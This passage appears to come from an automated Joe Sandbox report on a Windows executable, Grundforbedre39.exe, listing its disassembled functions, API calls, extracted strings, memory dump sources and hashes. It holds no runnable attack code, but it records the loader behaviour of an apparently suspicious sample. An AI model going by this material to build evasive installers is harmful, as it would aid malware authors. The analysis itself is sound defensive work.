                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3248276644-1197487810
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                      • CharNextW.USER32(00000000), ref: 00405A8C
                                                                                      • CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3213498283-4087429501
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402D9D
                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402DE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$1033
                                                                                      • API String ID: 530164218-988959552
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                                                      • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,75B23420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                                                      • GlobalFree.KERNEL32(?), ref: 004037EF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3355392842
                                                                                      • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                                                      • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405A20
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405A30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3370423016
                                                                                      • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                                                      • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.6%
                                                                                      Total number of Nodes:110
                                                                                      Total number of Limit Nodes:0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 355534e0-355534ec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3388e0b4b40acff0bd8fd618d5a721d823f9bdfdf41d330472cdc4024e33f085
                                                                                      • Instruction ID: 995c9f58472cb396645b0e5439d5db9e56c2899c4d28525d040878e4163565d9
                                                                                      • Opcode Fuzzy Hash: 3388e0b4b40acff0bd8fd618d5a721d823f9bdfdf41d330472cdc4024e33f085
                                                                                      • Instruction Fuzzy Hash: 5C90023160514402D54061588624706109547D0209FA1DC56A0414528DCBA5995975A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 35552d10-35552d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 228a6f72688b29f1bdc204fe2adb28bc7e1b4fdd03cfb57e800ea199a9dd6a4e
                                                                                      • Instruction ID: 84db4b3cc4201540db602fd247e17d31fc8554f1b669f054a493dc5542ec0037
                                                                                      • Opcode Fuzzy Hash: 228a6f72688b29f1bdc204fe2adb28bc7e1b4fdd03cfb57e800ea199a9dd6a4e
                                                                                      • Instruction Fuzzy Hash: CC90023120104413D55161588614707009947D0249FD1DC57A0414518DDA66995AB122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 35552b90-35552b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8ba9a2579fdd5c16073fad019b32d3f0398baf8456ff1dad97443d30192ca8c8
                                                                                      • Instruction ID: cb9d588e263f810f07decb79e3ae4d8b78db437e3a863b10bc1d73576ea204c6
                                                                                      • Opcode Fuzzy Hash: 8ba9a2579fdd5c16073fad019b32d3f0398baf8456ff1dad97443d30192ca8c8
                                                                                      • Instruction Fuzzy Hash: A99002312010C802D5506158C51474A009547D0309F95DC56A4414618DCAA598997122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      • double initialized or corrupted critical section, xrefs: 35585313
                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 3558534E
                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355852D9
                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 35585215, 355852A1, 35585324
                                                                                      • Critical section debug info address, xrefs: 3558522A, 35585339
                                                                                      • corrupted critical section, xrefs: 355852CD
                                                                                      • Critical section address, xrefs: 35585230, 355852C7, 3558533F
                                                                                      • undeleted critical section in freed memory, xrefs: 35585236
                                                                                      • Critical section address., xrefs: 3558530D
                                                                                      • Thread identifier, xrefs: 35585345
                                                                                      • Invalid debug info address of this critical section, xrefs: 355852C1
                                                                                      • Address of the debug info found in the active list., xrefs: 355852B9, 35585305
                                                                                      • 8, xrefs: 355850EE
                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355852ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                      • API String ID: 0-2368682639
                                                                                      • Opcode ID: 66434d9a8f6353efb4f07bdda773fed0853b8daa9a55ad287882f32e3682f868
                                                                                      • Instruction ID: a03a0b5be7e0647d0c837a9b7925aa8580be7368080419c2f0fd37b80ac33653
                                                                                      • Opcode Fuzzy Hash: 66434d9a8f6353efb4f07bdda773fed0853b8daa9a55ad287882f32e3682f868
                                                                                      • Instruction Fuzzy Hash: F78158B1A01358BFEB14CF98C840B9EBBB5BB48710F614199E945AB240DB76B945CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: 4d8725b4288761d295a8a5314e75c5ccf3ca37ec350ecbcc85b589afcf9cfd73
                                                                                      • Instruction ID: 80f19a1839f152f91639b06e732060b3ffbac1593c8cd33fa5ed6d14b3bbe1bc
                                                                                      • Opcode Fuzzy Hash: 4d8725b4288761d295a8a5314e75c5ccf3ca37ec350ecbcc85b589afcf9cfd73
                                                                                      • Instruction Fuzzy Hash: 9791ED39A04645AFDF01CFE8C444AADBBF2FF89310F848959E445AB251CBB5A941CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3550651C
                                                                                        • Part of subcall function 35506565: RtlDebugPrintTimes.NTDLL ref: 35506614
                                                                                        • Part of subcall function 35506565: RtlDebugPrintTimes.NTDLL ref: 3550665F
                                                                                      Strings
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3556977C
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 355697A0, 355697C9
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35569790
                                                                                      • apphelp.dll, xrefs: 35506446
                                                                                      • LdrpInitShimEngine, xrefs: 35569783, 35569796, 355697BF
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 355697B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      • Opcode ID: 092300e3199f48949ab57c97794dd4d4e935d94e89502e30bba1bd9f3970793f
                                                                                      • Instruction ID: e6eec8753768fb410c020d5f178c914c40f7377ab954c1a4ee5e8d6f3424f0f8
                                                                                      • Opcode Fuzzy Hash: 092300e3199f48949ab57c97794dd4d4e935d94e89502e30bba1bd9f3970793f
                                                                                      • Instruction Fuzzy Hash: 62519EB1619348AFE314DF24D890EABB7F4FBC4648F800919F995972A0DB31E905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      • @, xrefs: 3550D24F
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 3550D136
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3550D202
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3550D0E6
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3550D263
                                                                                      • @, xrefs: 3550D09D
                                                                                      • h.S5, xrefs: 3556A5D2
                                                                                      • @, xrefs: 3550D2B3
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3550D06F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.S5
                                                                                      • API String ID: 0-1346052954
                                                                                      • Opcode ID: e5a0445408cf79298c5c21a24e6cfefbc9cdf02e6382c700e9ff6ef744d3868e
                                                                                      • Instruction ID: ea0f15ea90247fd16290db6f29a43d1aacba8701fd56dacee0734ad02ecc1786
                                                                                      • Opcode Fuzzy Hash: e5a0445408cf79298c5c21a24e6cfefbc9cdf02e6382c700e9ff6ef744d3868e
                                                                                      • Instruction Fuzzy Hash: 1EA12BB1A083459FE721CF54C840B5BB7E8BB84769F414D2EF98997240DB74E948CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3553D879
                                                                                        • Part of subcall function 35514779: RtlDebugPrintTimes.NTDLL ref: 35514817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: 8ef512304fc3ed7633ec5042305992548dc0f66537c4bcc8d206d25a71c9a0b5
                                                                                      • Instruction ID: 8fc6b30e32b78bbafa4b8ac3150a95100ea553804f34374c196983e355a91673
                                                                                      • Opcode Fuzzy Hash: 8ef512304fc3ed7633ec5042305992548dc0f66537c4bcc8d206d25a71c9a0b5
                                                                                      • Instruction Fuzzy Hash: 625112B5A09349AFEB04CFA4C44578DBFB2BF84394F614059C409BB281DB71B942CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • VerifierDebug, xrefs: 35598925
                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 3559880F
                                                                                      • VerifierFlags, xrefs: 355988D0
                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 355986BD
                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 355986E7
                                                                                      • HandleTraces, xrefs: 3559890F
                                                                                      • VerifierDlls, xrefs: 3559893D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                      • API String ID: 0-3223716464
                                                                                      • Opcode ID: 86973b185a1a2c87ed8b1cf606494c3fb57ce46ab1530f0640412b211475f960
                                                                                      • Instruction ID: e2200f848c8e233314b5bb3b80b1e771ee11661388b243839d0ea5cc7737dacd
                                                                                      • Opcode Fuzzy Hash: 86973b185a1a2c87ed8b1cf606494c3fb57ce46ab1530f0640412b211475f960
                                                                                      • Instruction Fuzzy Hash: 3B9125B2608715AFE719CF24C890F9A77B9BF84714F850859F9406B240CB39BC05CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3557A7AF
                                                                                      • DGN5, xrefs: 35532382
                                                                                      • LdrpDynamicShimModule, xrefs: 3557A7A5
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3557A79F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DGN5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-42042572
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
